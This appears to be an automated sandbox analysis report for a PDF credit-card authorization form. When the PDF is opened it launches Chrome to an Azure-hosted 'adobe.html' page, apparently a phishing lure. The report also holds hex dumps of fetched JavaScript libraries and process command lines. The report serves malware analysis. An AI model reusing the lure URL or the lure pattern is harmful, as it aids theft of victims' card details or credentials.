                            2024-12-18 00:01:56 UTC1369INData Raw: 7a 69 70 45 6e 74 72 69 65 73 22 29 2c 61 3d 65 28 22 2e 2f 73 74 72 65 61 6d 2f 43 72 63 33 32 50 72 6f 62 65 22 29 2c 6c 3d 65 28 22 2e 2f 6e 6f 64 65 6a 73 55 74 69 6c 73 22 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 6e 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 69 2e 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 6e 2e 64 65 63 6f 6d 70 72 65 73 73 65 64 2e 67 65 74 43 6f 6e 74 65 6e 74 57 6f 72 6b 65 72 28 29 2e 70 69 70 65 28 6e 65 77 20 61 29 3b 72 2e 6f 6e 28 22 65 72 72 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 28 65 29 7d 29 2e 6f 6e 28 22 65 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 73 74 72 65 61 6d 49 6e 66 6f 2e 63 72 63 33 32 21 3d 3d 6e 2e 64 65 63 6f 6d 70 72 65 73 73 65 64 2e 63 72 63 33 32
                            Data Ascii: zipEntries"),a=e("./stream/Crc32Probe"),l=e("./nodejsUtils");function f(n){return new i.Promise(function(e,t){var r=n.decompressed.getContentWorker().pipe(new a);r.on("error",function(e){t(e)}).on("end",function(){r.streamInfo.crc32!==n.decompressed.crc32


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.1649729151.101.1.2294437904C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 00:01:57 UTC387OUTGET /npm/javascript-obfuscator/dist/index.browser.js HTTP/1.1
                            Host: cdn.jsdelivr.net
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 00:01:58 UTC761INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 1534944
                            Access-Control-Allow-Origin: *
                            Access-Control-Expose-Headers: *
                            Timing-Allow-Origin: *
                            Cache-Control: public, max-age=604800, s-maxage=43200
                            Cross-Origin-Resource-Policy: cross-origin
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Content-Type: application/javascript; charset=utf-8
                            X-JSD-Version: 4.1.1
                            X-JSD-Version-Type: version
                            ETag: W/"176be0-ZKd3I1MIpHM7ByqRe4LbBKMiybE"
                            Accept-Ranges: bytes
                            Date: Wed, 18 Dec 2024 00:01:58 GMT
                            Age: 38851
                            X-Served-By: cache-fra-etou8220144-FRA, cache-ewr-kewr1740033-EWR
                            X-Cache: HIT, HIT
                            Vary: Accept-Encoding
                            alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                            2024-12-18 00:01:58 UTC16384INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 69 6e 64 65 78 2e 62 72 6f 77 73 65 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 4a 61 76 61 53 63 72 69 70 74 4f 62 66 75 73 63
                            Data Ascii: /*! For license information please see index.browser.js.LICENSE.txt */!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.JavaScriptObfusc
                            2024-12-18 00:01:58 UTC16384INData Raw: 79 2c 72 26 4f 3f 52 3a 31 29 29 2c 69 7d 2c 46 6f 72 49 6e 53 74 61 74 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 6e 65 72 61 74 65 49 74 65 72 61 74 69 6f 6e 46 6f 72 53 74 61 74 65 6d 65 6e 74 28 22 69 6e 22 2c 65 2c 74 26 4f 3f 52 3a 31 29 7d 2c 46 6f 72 4f 66 53 74 61 74 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 6e 65 72 61 74 65 49 74 65 72 61 74 69 6f 6e 46 6f 72 53 74 61 74 65 6d 65 6e 74 28 22 6f 66 22 2c 65 2c 74 26 4f 3f 52 3a 31 29 7d 2c 4c 61 62 65 6c 65 64 53 74 61 74 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 65 2e 6c 61 62 65 6c 2e 6e 61 6d 65 2b 22 3a 22 2c 74 68 69 73 2e 6d 61 79 62
                            Data Ascii: y,r&O?R:1)),i},ForInStatement:function(e,t){return this.generateIterationForStatement("in",e,t&O?R:1)},ForOfStatement:function(e,t){return this.generateIterationForStatement("of",e,t&O?R:1)},LabeledStatement:function(e,t){return[e.label.name+":",this.mayb
                            2024-12-18 00:01:58 UTC16384INData Raw: 3d 3d 74 2e 6c 65 6e 67 74 68 26 26 28 65 2e 65 78 74 65 6e 64 65 64 52 61 6e 67 65 5b 31 5d 3d 74 5b 72 5d 2e 72 61 6e 67 65 5b 30 5d 29 2c 28 72 2d 3d 31 29 3e 3d 30 26 26 28 65 2e 65 78 74 65 6e 64 65 64 52 61 6e 67 65 5b 30 5d 3d 74 5b 72 5d 2e 72 61 6e 67 65 5b 31 5d 29 2c 65 7d 72 65 74 75 72 6e 20 72 3d 7b 41 73 73 69 67 6e 6d 65 6e 74 45 78 70 72 65 73 73 69 6f 6e 3a 22 41 73 73 69 67 6e 6d 65 6e 74 45 78 70 72 65 73 73 69 6f 6e 22 2c 41 73 73 69 67 6e 6d 65 6e 74 50 61 74 74 65 72 6e 3a 22 41 73 73 69 67 6e 6d 65 6e 74 50 61 74 74 65 72 6e 22 2c 41 72 72 61 79 45 78 70 72 65 73 73 69 6f 6e 3a 22 41 72 72 61 79 45 78 70 72 65 73 73 69 6f 6e 22 2c 41 72 72 61 79 50 61 74 74 65 72 6e 3a 22 41 72 72 61 79 50 61 74 74 65 72 6e 22 2c 41 72 72 6f 77 46
                            Data Ascii: ==t.length&&(e.extendedRange[1]=t[r].range[0]),(r-=1)>=0&&(e.extendedRange[0]=t[r].range[1]),e}return r={AssignmentExpression:"AssignmentExpression",AssignmentPattern:"AssignmentPattern",ArrayExpression:"ArrayExpression",ArrayPattern:"ArrayPattern",ArrowF
                            2024-12-18 00:01:58 UTC16384INData Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 75 72 72 65 6e 74 28 29 2e 74 79 70 65 7c 7c 74 68 69 73 2e 5f 5f 63 75 72 72 65 6e 74 2e 77 72 61 70 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 65 6e 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 72 3b 66 6f 72 28 72 3d 5b 5d 2c 65 3d 31 2c 74 3d 74 68 69 73 2e 5f 5f 6c 65 61 76 65 6c 69 73 74 2e 6c 65 6e 67 74 68 3b 65 3c 74 3b 2b 2b 65 29 72 2e 70 75 73 68 28 74 68 69 73 2e 5f 5f 6c 65 61 76 65 6c 69 73 74 5b 65 5d 2e 6e 6f 64 65 29 3b 72 65 74 75 72 6e 20 72 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 63 75 72 72 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 63 75 72 72 65 6e 74 2e 6e 6f 64 65 7d 2c 64 2e 70 72 6f 74 6f 74 79
                            Data Ascii: tion(){return this.current().type||this.__current.wrap},d.prototype.parents=function(){var e,t,r;for(r=[],e=1,t=this.__leavelist.length;e<t;++e)r.push(this.__leavelist[e].node);return r},d.prototype.current=function(){return this.__current.node},d.prototy
                            2024-12-18 00:01:58 UTC16384INData Raw: 70 6f 73 3d 72 2c 74 68 69 73 2e 6c 69 6e 65 53 74 61 72 74 3d 74 68 69 73 2e 69 6e 70 75 74 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 5c 6e 22 2c 72 2d 31 29 2b 31 2c 74 68 69 73 2e 63 75 72 4c 69 6e 65 3d 74 68 69 73 2e 69 6e 70 75 74 2e 73 6c 69 63 65 28 30 2c 74 68 69 73 2e 6c 69 6e 65 53 74 61 72 74 29 2e 73 70 6c 69 74 28 76 29 2e 6c 65 6e 67 74 68 29 3a 28 74 68 69 73 2e 70 6f 73 3d 74 68 69 73 2e 6c 69 6e 65 53 74 61 72 74 3d 30 2c 74 68 69 73 2e 63 75 72 4c 69 6e 65 3d 31 29 2c 74 68 69 73 2e 74 79 70 65 3d 53 2e 65 6f 66 2c 74 68 69 73 2e 76 61 6c 75 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 74 61 72 74 3d 74 68 69 73 2e 65 6e 64 3d 74 68 69 73 2e 70 6f 73 2c 74 68 69 73 2e 73 74 61 72 74 4c 6f 63 3d 74 68 69 73 2e 65 6e 64 4c 6f 63 3d 74 68 69 73
                            Data Ascii: pos=r,this.lineStart=this.input.lastIndexOf("\n",r-1)+1,this.curLine=this.input.slice(0,this.lineStart).split(v).length):(this.pos=this.lineStart=0,this.curLine=1),this.type=S.eof,this.value=null,this.start=this.end=this.pos,this.startLoc=this.endLoc=this
                            2024-12-18 00:01:58 UTC16384INData Raw: 7b 76 61 72 20 72 3d 65 2e 63 6f 6d 70 75 74 65 64 2c 6e 3d 65 2e 6b 65 79 3b 72 65 74 75 72 6e 21 72 26 26 28 22 49 64 65 6e 74 69 66 69 65 72 22 3d 3d 3d 6e 2e 74 79 70 65 26 26 6e 2e 6e 61 6d 65 3d 3d 3d 74 7c 7c 22 4c 69 74 65 72 61 6c 22 3d 3d 3d 6e 2e 74 79 70 65 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 74 29 7d 7a 2e 70 61 72 73 65 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 2c 69 29 7b 74 68 69 73 2e 69 6e 69 74 46 75 6e 63 74 69 6f 6e 28 65 29 2c 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 63 6d 61 56 65 72 73 69 6f 6e 3e 3d 39 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 63 6d 61 56 65 72 73 69 6f 6e 3e 3d 36 26 26 21 6e 29 26 26 28 74 68 69 73 2e 74 79 70 65 3d 3d 3d 53 2e 73 74 61 72 26 26 74 26 4a 26 26 74 68 69
                            Data Ascii: {var r=e.computed,n=e.key;return!r&&("Identifier"===n.type&&n.name===t||"Literal"===n.type&&n.value===t)}z.parseFunction=function(e,t,r,n,i){this.initFunction(e),(this.options.ecmaVersion>=9||this.options.ecmaVersion>=6&&!n)&&(this.type===S.star&&t&J&&thi
                            2024-12-18 00:01:58 UTC16384INData Raw: 53 2e 62 72 61 63 65 52 2e 75 70 64 61 74 65 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 31 21 3d 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 70 6f 70 28 29 3b 65 3d 3d 3d 6e 65 2e 62 5f 73 74 61 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 68 69 73 2e 63 75 72 43 6f 6e 74 65 78 74 28 29 2e 74 6f 6b 65 6e 26 26 28 65 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 70 6f 70 28 29 29 2c 74 68 69 73 2e 65 78 70 72 41 6c 6c 6f 77 65 64 3d 21 65 2e 69 73 45 78 70 72 7d 65 6c 73 65 20 74 68 69 73 2e 65 78 70 72 41 6c 6c 6f 77 65 64 3d 21 30 7d 2c 53 2e 62 72 61 63 65 4c 2e 75 70 64 61 74 65 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73
                            Data Ascii: S.braceR.updateContext=function(){if(1!==this.context.length){var e=this.context.pop();e===ne.b_stat&&"function"===this.curContext().token&&(e=this.context.pop()),this.exprAllowed=!e.isExpr}else this.exprAllowed=!0},S.braceL.updateContext=function(e){this
                            2024-12-18 00:01:58 UTC16384INData Raw: 79 77 6f 72 64 7c 7c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 63 6d 61 56 65 72 73 69 6f 6e 3e 3d 39 26 26 74 68 69 73 2e 74 79 70 65 3d 3d 3d 53 2e 73 74 61 72 29 26 26 21 76 2e 74 65 73 74 28 74 68 69 73 2e 69 6e 70 75 74 2e 73 6c 69 63 65 28 74 68 69 73 2e 6c 61 73 74 54 6f 6b 45 6e 64 2c 74 68 69 73 2e 73 74 61 72 74 29 29 7d 2c 61 65 2e 70 61 72 73 65 4f 62 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 73 74 61 72 74 4e 6f 64 65 28 29 2c 6e 3d 21 30 2c 69 3d 7b 7d 3b 66 6f 72 28 72 2e 70 72 6f 70 65 72 74 69 65 73 3d 5b 5d 2c 74 68 69 73 2e 6e 65 78 74 28 29 3b 21 74 68 69 73 2e 65 61 74 28 53 2e 62 72 61 63 65 52 29 3b 29 7b 69 66 28 6e 29 6e 3d 21 31 3b 65 6c 73 65 20 69 66 28 74 68 69 73 2e 65 78 70 65 63 74 28
                            Data Ascii: yword||this.options.ecmaVersion>=9&&this.type===S.star)&&!v.test(this.input.slice(this.lastTokEnd,this.start))},ae.parseObj=function(e,t){var r=this.startNode(),n=!0,i={};for(r.properties=[],this.next();!this.eat(S.braceR);){if(n)n=!1;else if(this.expect(
                            2024-12-18 00:01:58 UTC16384INData Raw: 32 39 35 7c 7c 69 3e 3d 35 37 33 34 34 7c 7c 65 2b 31 3e 3d 6e 29 72 65 74 75 72 6e 20 69 3b 76 61 72 20 61 3d 72 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2b 31 29 3b 72 65 74 75 72 6e 20 61 3e 3d 35 36 33 32 30 26 26 61 3c 3d 35 37 33 34 33 3f 28 69 3c 3c 31 30 29 2b 61 2d 35 36 36 31 33 38 38 38 3a 69 7d 2c 4d 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 78 74 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 21 31 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 73 6f 75 72 63 65 2c 6e 3d 72 2e 6c 65 6e 67 74 68 3b 69 66 28 65 3e 3d 6e 29 72 65 74 75 72 6e 20 6e 3b 76 61 72 20 69 2c 61 3d 72 2e 63 68 61 72 43 6f 64 65 41 74 28 65 29 3b 72 65 74 75 72 6e 21 74 26 26 21 74 68 69 73 2e 73 77 69 74 63 68 55 7c 7c 61
                            Data Ascii: 295||i>=57344||e+1>=n)return i;var a=r.charCodeAt(e+1);return a>=56320&&a<=57343?(i<<10)+a-56613888:i},Me.prototype.nextIndex=function(e,t){void 0===t&&(t=!1);var r=this.source,n=r.length;if(e>=n)return n;var i,a=r.charCodeAt(e);return!t&&!this.switchU||a
                            2024-12-18 00:01:58 UTC16384INData Raw: 73 2b 31 29 3b 72 65 74 75 72 6e 20 74 3d 3d 3d 65 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 63 6d 61 56 65 72 73 69 6f 6e 3e 3d 31 32 26 26 36 31 3d 3d 3d 74 68 69 73 2e 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 74 68 69 73 2e 70 6f 73 2b 32 29 3f 74 68 69 73 2e 66 69 6e 69 73 68 4f 70 28 53 2e 61 73 73 69 67 6e 2c 33 29 3a 74 68 69 73 2e 66 69 6e 69 73 68 4f 70 28 31 32 34 3d 3d 3d 65 3f 53 2e 6c 6f 67 69 63 61 6c 4f 52 3a 53 2e 6c 6f 67 69 63 61 6c 41 4e 44 2c 32 29 3a 36 31 3d 3d 3d 74 3f 74 68 69 73 2e 66 69 6e 69 73 68 4f 70 28 53 2e 61 73 73 69 67 6e 2c 32 29 3a 74 68 69 73 2e 66 69 6e 69 73 68 4f 70 28 31 32 34 3d 3d 3d 65 3f 53 2e 62 69 74 77 69 73 65 4f 52 3a 53 2e 62 69 74 77 69 73 65 41 4e 44 2c 31 29 7d 2c 47 65 2e 72 65 61 64 54
                            Data Ascii: s+1);return t===e?this.options.ecmaVersion>=12&&61===this.input.charCodeAt(this.pos+2)?this.finishOp(S.assign,3):this.finishOp(124===e?S.logicalOR:S.logicalAND,2):61===t?this.finishOp(S.assign,2):this.finishOp(124===e?S.bitwiseOR:S.bitwiseAND,1)},Ge.readT


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:19:01:35
                            Start date:17/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Credit Card Authorization Form.pdf"
                            Imagebase:0x7ff7db420000
                            File size:5'641'176 bytes
                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:3
                            Start time:19:01:38
                            Start date:17/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                            Imagebase:0x7ff7ba340000
                            File size:3'581'912 bytes
                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:4
                            Start time:19:01:39
                            Start date:17/12/2024
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2260 --field-trial-handle=1552,i,16749495978696567103,8341145372217453035,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                            Imagebase:0x7ff7ba340000
                            File size:3'581'912 bytes
                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:13
                            Start time:19:01:47
                            Start date:17/12/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
                            Imagebase:0x7ff7f9810000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:14
                            Start time:19:01:48
                            Start date:17/12/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,927129136615329189,15538360311667193620,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff7f9810000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:18
                            Start time:19:03:08
                            Start date:17/12/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D
                            Imagebase:0x7ff7f9810000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:19
                            Start time:19:03:08
                            Start date:17/12/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1984,i,4601340424966888979,1320841207906655574,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff7f9810000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            No disassembly